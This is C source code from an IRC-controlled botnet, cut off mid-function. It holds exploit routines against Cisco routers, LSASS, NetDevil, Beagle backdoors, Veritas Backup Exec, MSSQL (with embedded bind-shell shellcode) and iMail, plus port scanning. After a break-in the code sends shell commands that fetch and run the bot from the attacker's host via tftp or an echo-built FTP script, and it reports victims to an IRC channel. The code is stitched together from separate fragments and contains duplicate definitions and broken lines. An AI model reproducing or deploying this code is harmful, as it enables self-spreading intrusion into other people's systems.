BOOL CiscoHTTP(EXINFO exinfo)
{
int ret,SocketFD;
char buffer[4096];
if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
if(fsend(SocketFD, HTTP_REQUEST, strlen(HTTP_REQUEST), 0) < 0)
return FALSE;
memset(buffer, 0, sizeof(buffer));
if((ret = frecv(SocketFD, buffer, sizeof(buffer), 0)) < 0)
return FALSE;
fclosesocket(SocketFD);
if(ret < 5)
return FALSE;
if(strstr(buffer, "HTTP/1.0 200 OK") == NULL || strstr(buffer, "cisco") == NULL)
return FALSE;
char sendbuf[IRCLINE];
_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(http)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
// checks ip for open port
DWORD WINAPI ScanConnectThread(LPVOID param)
{
static char sendbuf[IRCLINE];
SCAN scan = *((SCAN *)param);
SCAN *scans = (SCAN *)param;
scans->cgotinfo = TRUE;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)scan.port);
ssin.sin_addr = scan.addy;
SOCKET sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock != INVALID_SOCKET) {
DWORD err = fconnect(sock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN));
threads[scan.threadnum].sock = sock;
if (err != SOCKET_ERROR) {
sprintf(sendbuf,"nz m (portscan.p l g) »» IP: %s Port: %d is open.", finet_ntoa(scan.addy), scan.port);
irc_privmsg(scan.sock, scan.chan, sendbuf, scan.notice);
addlog(sendbuf);
}
}
fclosesocket(sock);
return 0;
}
BOOL Cisco(EXINFO exinfo)
{
int ret,SocketFD;
char buffer1[64],buffer2[64];
if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
memset(buffer1, '\0', 64);
memset(buffer2, '\0', 64);
if ((ret = frecv(SocketFD, buffer1, 64, 0)) > 0)
{
ret = frecv(SocketFD, buffer1, 64, 0);
fsend(SocketFD,"cisco\r",6,0);
ret = frecv(SocketFD, buffer2, 64, 0);
if( (memcmp(buffer2,"\r\nPass",6)) && !(memcmp(buffer1,"\r\n\r\nUser Access Verification\r\n\r\nPassword",40)))
{
char sendbuf[IRCLINE];
_snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(telnet)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
return TRUE;
}
}
}
return FALSE;
}
bool ConnectShell(EXINFO exinfo) {
int len;
struct sockaddr_in shell_addr;
char recvbuf[1024];
SOCKET sockfd;
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
shell_addr.sin_port = fhtons((unsigned short)exinfo.port);;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == -1 )
return false;
if (fconnect(sockfd, (struct sockaddr *)&shell_addr, sizeof(struct sockaddr)) == -1)
return false;
char mkdir_buff[400]="";
len = frecv(sockfd, recvbuf, 1024, 0);
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s\n"
"%s\n",
GetIP(exinfo.sock),filename, filename);
if (fsend(sockfd, mkdir_buff, sizeof(mkdir_buff)-1,0) == -1)
return false;
return true;
}
unsigned long GetSpeed(char *szHost) {
if(strlen(szHost) > MAXHOSTNAME) return 0;
unsigned long lBufSize=NUM_KILOBYTES*1024;
SOCKET sSock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
if ((ssin.sin_addr.s_addr = ResolveAddress(szHost)) == 0) return 0;
ssin.sin_port = fhtons(80);
if ((sSock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return 0;
if (fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return 0;
char *szBuf=new char[lBufSize+3];
srand(GetTickCount());
int iChar=(char)(rand() % 255);
memset(szBuf, 0, lBufSize+1 );
memset(szBuf, iChar, lBufSize );
unsigned long lStrLen=strlen(szBuf);
char *szPostReq=new char[lBufSize+1002];
sprintf(szPostReq, "POST / HTTP/1.0\r\n"
"Host: %s\r\n"
"Content-Length: %d\r\n"
"\r\n",
szHost, lStrLen);
strcat(szPostReq, szBuf);
strcat(szPostReq, "\r\n");
lStrLen=strlen(szPostReq);
unsigned long lStartMS=GetTickCount();
for(unsigned long l=0; l<lStrLen; l+=1024) {
if(lStrLen-l < 1024) {
if(fsend(sSock, szPostReq+l, lStrLen-l,0) == SOCKET_ERROR) {
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return 0;
}
} else {
if(fsend(sSock, szPostReq+l, 1024,0) == SOCKET_ERROR) {
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return 0;
}
}
}
unsigned long lEndMS=GetTickCount();
float fElapsedS=(float)(lEndMS-lStartMS)/1000.0f;
if(fElapsedS==0.0f) fElapsedS=1.0f;
float fBytesPS=(float)lStrLen/fElapsedS;
float fKBytesPS=fBytesPS/1024.0f;
float fBitsPS=fBytesPS*8.0f;
float fKBitsPS=fBitsPS/1024.0f;
fclosesocket(sSock);
free(szBuf);
free(szPostReq);
return (unsigned long)fKBitsPS;
}
BOOL AdvPortOpen(unsigned long ip, unsigned int port, unsigned int delay)
{
SOCKADDR_IN sin;
unsigned long blockcmd=1;
SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0);
if (sock == INVALID_SOCKET)
return FALSE;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = ip;
sin.sin_port = fhtons((unsigned short)port);
fioctlsocket(sock,FIONBIO,&blockcmd);
fconnect(sock,(LPSOCKADDR)&sin,sizeof(sin));
TIMEVAL timeout;
timeout.tv_sec=delay;
timeout.tv_usec=0;
FD_SET rset;
FD_ZERO(&rset);
FD_SET(sock,&rset);
int i = fselect(0,0,&rset,0,&timeout);
fclosesocket(sock);
if (i<=0)
return FALSE;
else
return TRUE;
}
SOCKET CreateSock(char *host, unsigned short port)
{
SOCKET ssock;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
return INVALID_SOCKET;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(port);
IN_ADDR in;
in.s_addr = finet_addr(host);
LPHOSTENT Hostent = NULL;
if (in.s_addr == INADDR_NONE)
Hostent = fgethostbyname(host); //hostname
if (Hostent == NULL && in.s_addr == INADDR_NONE) //error dns
return INVALID_SOCKET;
ssin.sin_addr = ((Hostent != NULL)?(*((LPIN_ADDR)*Hostent->h_addr_list)):(in));
if (fconnect(ssock, (LPSOCKADDR) &ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
return INVALID_SOCKET;
}
return (ssock);
}
BOOL thcsql(char *target, void* conn,EXINFO exinfo)
{
IRC* irc=(IRC*)conn;
unsigned int sock,rc;
struct sockaddr_in sqludp;
if ((sock=fsocket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
return FALSE;
sqludp.sin_family=AF_INET;
sqludp.sin_addr.s_addr=finet_addr(exinfo.ip);
sqludp.sin_port=fhtons(exinfo.port);
if ((rc=fconnect(sock, (struct sockaddr *)&sqludp, sizeof(struct sockaddr_in)))=SOCKET_ERROR)
{
if(rc==0)
{
fsend(sock,badbuffer,sizeof(badbuffer)-1,0);
Sleep(1000);
if (ConnectShell(exinfo, 31337))
{
exploit[exinfo.exploit].stats++;
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
}
fshutdown(sock,1);
fclosesocket(sock);
return FALSE;
}
BOOL lsass(EXINFO exinfo)
{
int len;
SOCKET sockfd;
int dport = 44444;
struct sockaddr_in their_addr;
char recvbuf[1600];
{
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
/* ^ Server's address */
their_addr.sin_port = fhtons((unsigned short)exinfo.port);
/* connect to the server */
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
if (fconnect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == SOCKET_ERROR)
return FALSE;
if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
switch (recvbuf[68]) {
case '1': // win XP
if (!Exploit2( exinfo, sockfd, 0 ))
return FALSE;
break;
case '0': //win 2k
if (!Exploit2( exinfo, sockfd, 2 ))
if (!Exploit2( exinfo, sockfd, 1))
return FALSE;
break;
default:
return FALSE;
}
}
return TRUE;
}
BOOL NetDevil(EXINFO exinfo)
{
char buffer[IRCLINE];
DWORD mode=0;
SOCKET ssock;
if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
return FALSE;
SOCKADDR_IN sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
sin.sin_port = fhtons(exinfo.port);
fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin));
fioctlsocket(ssock,FIONBIO,&mode);
for (int i=0; passwords[i]; i++) {
Sleep(50);
memset(buffer,0,sizeof(buffer));
if (NetDevil_Receive(ssock) == -1)
break;
if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0)
break;
if (strcmp(buffer,"passed") == 0) {
sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]);
fsend(ssock, buffer, strlen(buffer), 0);
if (NetDevil_Upload(exinfo.ip,ssock) == 1) {
fclosesocket(ssock);
_snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1])));
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
break;
}
if (strcmp(buffer,"pass_pleaz") == 0) {
memset(buffer,0,sizeof(buffer));
sprintf(buffer,"pass_pleaz%s",passwords[i]);
fsend(ssock,buffer ,strlen(buffer), 0);
continue;
}
else break;
}
fclosesocket(ssock);
return FALSE;
}
int connect_no_timeout(unsigned int sockfd,
const struct sockaddr *addr,
int addrlen,
struct timeval *timeout)
{
int error = 0, ret;
int error_len;
fd_set rset, wset;
if (timeout == NULL) {
/* blocking mode */
return connect(sockfd, addr, addrlen);
}
/* Set the socket to be non-blocking */
SET_SOCK_BLOCK(sockfd, 0);
fconnect(sockfd, addr, addrlen);
FD_ZERO(&rset);
FD_SET(sockfd, &rset);
FD_ZERO(&wset);
FD_SET(sockfd, &wset);
if ((ret = fselect(sockfd + 1, &rset, &wset, NULL, timeout)) == 0) {
return SOCKET_ERROR;
}
if (ret == SOCKET_ERROR) {
return SOCKET_ERROR;
}
if(FD_ISSET(sockfd, &rset) || FD_ISSET(sockfd, &wset)) {
error_len = sizeof(error);
if (getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (char *) &error, &error_len) == SOCKET_ERROR) {
return SOCKET_ERROR;
}
} else {
/* whoops: sockfd has disappeared */
return SOCKET_ERROR;
}
/* Set the socket back to blocking
ioctlsocket(sockfd, FIONBIO, &block);
*/
if (error) {
return SOCKET_ERROR;
}
return 0;
}
BOOL SkonkShell( EXINFO exinfo, unsigned int bindport ) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
shell_addr.sin_port = fhtons(bindport);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s &%s\r\n",
GetIP( exinfo.sock ),filename, filename);
#endif
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
DWORD WINAPI IRC_Connect(LPVOID param)
{
IRC irc = *((IRC *)param);
IRC *ircs = (IRC *)param;
ircs->gotinfo = TRUE;
int rval = 0;
SOCKADDR_IN ssin;
while (1) {
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(irc.port);
if ((ssin.sin_addr.s_addr=ResolveAddress(irc.host)) == 0)
break;
memset(threads[irc.threadnum].nick, 0, sizeof(threads[irc.threadnum].nick));
rndnick(threads[irc.threadnum].nick, nicktype, nickprefix);
if ((threads[irc.threadnum].sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
Sleep(5000);
continue;
}
if (fconnect(threads[irc.threadnum].sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(threads[irc.threadnum].sock);
FlushDNSCache();
Sleep(5000);
continue;
}
#ifdef DEBUG_CONSOLE
printf("Bot started and connect to %s.\n", irc.host);
#endif
addlogv("[MAIN]: Connected to %s.", irc.host);
rval = IRC_ReceiveLoop(threads[irc.threadnum].sock, irc.host, irc.channel, irc.chanpass, threads[irc.threadnum].nick, irc.clone);
fclosesocket(threads[irc.threadnum].sock);
if (rval == 0)
continue;
else if (rval == 1) {
Sleep(900000);
continue;
}
else if (rval == 2)
break;
}
clearthread(irc.threadnum);
return rval;
}
int check_os(char *host,unsigned short target_port, int *sp)
{
SOCKET sSock;
if ((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(host);
ssin.sin_port = fhtons((unsigned short)target_port);
if (fconnect(sSock,(LPSOCKADDR)&ssin,sizeof(ssin)) != SOCKET_ERROR) {
char recv_buff[5000];
memset(recv_buff,0,sizeof(recv_buff));
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(sSock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
if (fsend(sSock,(const char *)send_buff,strlen((const char*)send_buff),0) > 0) {
if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) {
fclosesocket(sSock);
*sp=atoi(&recv_buff[37]);
if (recv_buff[8] == 5 && recv_buff[12] == 0)
return ID_WIN2K;
else if (recv_buff[8] == 5 && recv_buff[12] == 1)
return ID_WINXP;
else if (recv_buff[8] == 5 && recv_buff[12] == 2)
return ID_WIN2K3;
else if (recv_buff[8] == 4)
return ID_WINNT;
else
return ID_UNKNOWN;
}
}
}
}
}
fclosesocket(sSock);
}
return 1;
}
BOOL Beagle(EXINFO exinfo)
{
char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
BOOL success = FALSE;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0)
return FALSE;
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
GetModuleFileName(0, botfile, sizeof(botfile));
_splitpath(botfile, NULL, NULL, fname, ext);
_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
if(fsend(sSock, buffer, sizeof(buffer), 0))
success = TRUE;
}
}
}
}
fclosesocket(sSock);
fWSACleanup();
if (success) {
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
}
return (success);
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
shell_addr.sin_port = fhtons(xport);;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
#ifndef NO_TFTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"tftp -i %s get %s\r\n",
GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s\r\n",
GetIP(exinfo.sock),FTP_PORT, filename, filename);
#endif
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
bool ConnectShell2(EXINFO exinfo) {
int len;
char recvbuf[1024];
SOCKET sockfd;
SOCKADDR_IN shell_addr;
memset(&shell_addr, 0, sizeof(shell_addr));
shell_addr.sin_family = AF_INET;
shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
shell_addr.sin_port = fhtons(7777);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET )
return false;
if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR)
return false;
char mkdir_buff[400];
len = frecv(sockfd, recvbuf, 1024, 0);
_snprintf(mkdir_buff, sizeof (mkdir_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
Sleep(500);
_snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename);
if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1024, 0);
fclosesocket(sockfd);
return true;
}
// FIX ME: This could probably be (re)moved, its just from the original exploit layout.
int WksSocket(int tm, int port, const char *WksIP) {
unsigned int sock;
unsigned long y = 1;
struct timeval timeout;
struct sockaddr_in target_ip;
if ((sock = fsocket(AF_INET, SOCK_STREAM, 0)) == -1)
return -1;
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = finet_addr(WksIP);
target_ip.sin_port = fhtons(port);
fioctlsocket(sock,FIONBIO,&y);
timeout.tv_sec=tm;
timeout.tv_usec = 0;
if (fconnect(sock, (struct sockaddr *)&target_ip, sizeof(target_ip)) == -1)
{
fd_set writefds;
fd_set exceptfds;
FD_ZERO (&writefds);
FD_ZERO (&exceptfds);
FD_SET (sock, &writefds);
FD_SET (sock, &exceptfds);
fselect(0, NULL, &writefds, &exceptfds, &timeout);
//if (!FDI_ISSET (sock, &writefds))
if (!__fWSAFDIsSet(sock, &writefds))
{
fclosesocket(sock);
return -1;
}
y=0;
fioctlsocket(sock,FIONBIO,&y);
}
return sock;
}
bool veritasbackupserver(EXINFO exinfo) {
SOCKET sock;
if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false;
SOCKADDR_IN sin;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = fhtons((unsigned short)exinfo.port);
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
char payload[800];
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
memcpy(&talk[37], &v91sp0sp1, 4);
memcpy(&talk[72], &esisp0sp1, 4);
//os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";
strcpy(payload,veritassc);
if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false;
if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false;
Sleep(10);
for (int i=0; i < 7;i++) {
if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false;
Sleep(10);
}
Sleep(1000);
fclosesocket(sock);
ConnectShell(exinfo,101);
return (AddEx(exinfo,true));
}
bool MSSQLResolution(EXINFO exinfo) {
/* win32_bind - EXITFUNC=process LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */
unsigned char scode[] =
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97\x27\xc8"
"\x3e\x83\xeb\xfc\xe2\xf4\x6b\x4d\x23\x73\x7f\xde\x37\xc1\x68\x47"
"\x43\x52\xb3\x03\x43\x7b\xab\xac\xb4\x3b\xef\x26\x27\xb5\xd8\x3f"
"\x43\x61\xb7\x26\x23\x77\x1c\x13\x43\x3f\x79\x16\x08\xa7\x3b\xa3"
"\x08\x4a\x90\xe6\x02\x33\x96\xe5\x23\xca\xac\x73\xec\x16\xe2\xc2"
"\x43\x61\xb3\x26\x23\x58\x1c\x2b\x83\xb5\xc8\x3b\xc9\xd5\x94\x0b"
"\x43\xb7\xfb\x03\xd4\x5f\x54\x16\x13\x5a\x1c\x64\xf8\xb5\xd7\x2b"
"\x43\x4e\x8b\x8a\x43\x7e\x9f\x79\xa0\xb0\xd9\x29\x24\x6e\x68\xf1"
"\xae\x6d\xf1\x4f\xfb\x0c\xff\x50\xbb\x0c\xc8\x73\x37\xee\xff\xec"
"\x25\xc2\xac\x77\x37\xe8\xc8\xae\x2d\x58\x16\xca\xc0\x3c\xc2\x4d"
"\xca\xc1\x47\x4f\x11\x37\x62\x8a\x9f\xc1\x41\x74\x9b\x6d\xc4\x74"
"\x8b\x6d\xd4\x74\x37\xee\xf1\x4f\xd9\x62\xf1\x74\x41\xdf\x02\x4f"
"\x6c\x24\xe7\xe0\x9f\xc1\x41\x4d\xd8\x6f\xc2\xd8\x18\x56\x33\x8a"
"\xe6\xd7\xc0\xd8\x1e\x6d\xc2\xd8\x18\x56\x72\x6e\x4e\x77\xc0\xd8"
"\x1e\x6e\xc3\x73\x9d\xc1\x47\xb4\xa0\xd9\xee\xe1\xb1\x69\x68\xf1"
"\x9d\xc1\x47\x41\xa2\x5a\xf1\x4f\xab\x53\x1e\xc2\xa2\x6e\xce\x0e"
"\x04\xb7\x70\x4d\x8c\xb7\x75\x16\x08\xcd\x3d\xd9\x8a\x13\x69\x65"
"\xe4\xad\x1a\x5d\xf0\x95\x3c\x8c\xa0\x4c\x69\x94\xde\xc1\xe2\x63"
"\x37\xe8\xcc\x70\x9a\x6f\xc6\x76\xa2\x3f\xc6\x76\x9d\x6f\x68\xf7"
"\xa0\x93\x4e\x22\x06\x6d\x68\xf1\xa2\xc1\x68\x10\x37\xee\x1c\x70"
"\x34\xbd\x53\x43\x37\xe8\xc5\xd8\x18\x56\xe9\xff\x2a\x4d\xc4\xd8"
"\x1e\xc1\x47\x27\xc8\x3e";
unsigned long targets[]={
0x42b48774 /*MSQL 2000 / MSDE*/
};
unsigned short sqlport = 1434;
char *request=(char*)malloc(1+800+5+1+sizeof(scode));
//\x68:888 => push dword 0x3838383a
memcpy(request+0, "\x04", 1);
memset(request+1, 0x90, 800);
memcpy(request+801, "\x68:888", 5);
memcpy(request+806, "\x90", 1);
memcpy(request+807, scode, sizeof(scode));
//return address of jmp esp
memcpy(request+97, (char*)&targets[0], 4);
//takes us right here, with 8 bytes available
memcpy(request+101, "\xeb\x69\xeb\x69", 8);
//write to thread storage space ala msrpc
memcpy(request+109, "\xcc\xe0\xff\x7f", 4); //0x7ffde0cc
memcpy(request+113, "\xcc\xe0\xff\x7f", 4);
//the payload starts here
memset(request+117, 0x90, 100);
memcpy(request+217, scode, sizeof(scode));
SOCKET s;
if ((s=fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == INVALID_SOCKET) return false;
SOCKADDR_IN ssin;
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)sqlport);
if (fconnect(s, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return false;
if (fsend(s, request, strlen(request), 0) == SOCKET_ERROR) return false;
fclosesocket(s);
//automatically restart sql server - thanks SK!
s=fsocket(AF_INET, SOCK_STREAM, 0);
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)4444);
if(fconnect(s, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return false;
char cmd_buff[400];
_snprintf(cmd_buff, sizeof(cmd_buff),
"net start sqlserveragent & "
"tftp -i %s GET %s & "
"%s",
exinfo.myip, filename, filename);
if(fsend(s,(char*)cmd_buff, strlen(cmd_buff),0) == SOCKET_ERROR) return false;
fclosesocket(s);
return (AddEx(exinfo,true));
}
BOOL iMail( char *target, void* conn,EXINFO exinfo )
{
IRC* irc=(IRC*)conn;
char szBanner[512];//, szShellcode[512];
int iRemoteTarget;
int ibindsize=405;
SOCKET sSocket;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Beginning attack on %s",exinfo.ip);Sleep(1500);
SOCKADDR_IN sinSockAddrIn;
memset(&sinSockAddrIn, 0, sizeof(sinSockAddrIn));
sinSockAddrIn.sin_family = AF_INET;
sinSockAddrIn.sin_addr.s_addr = finet_addr(exinfo.ip);
sinSockAddrIn.sin_port = fhtons(exinfo.port);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Initializing IP and port for %s:%d",exinfo.ip,exinfo.port);Sleep(1500);
if(!(sSocket = fWSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL)))
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Creating Socket for %s",exinfo.ip);Sleep(1500);
if(fconnect(sSocket, (LPSOCKADDR)&sinSockAddrIn, sizeof(sinSockAddrIn)) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Connecting to socket for %s",exinfo.ip);Sleep(1500);
if(frecv(sSocket, szBanner, sizeof(szBanner), 0) == SOCKET_ERROR)
return FALSE;
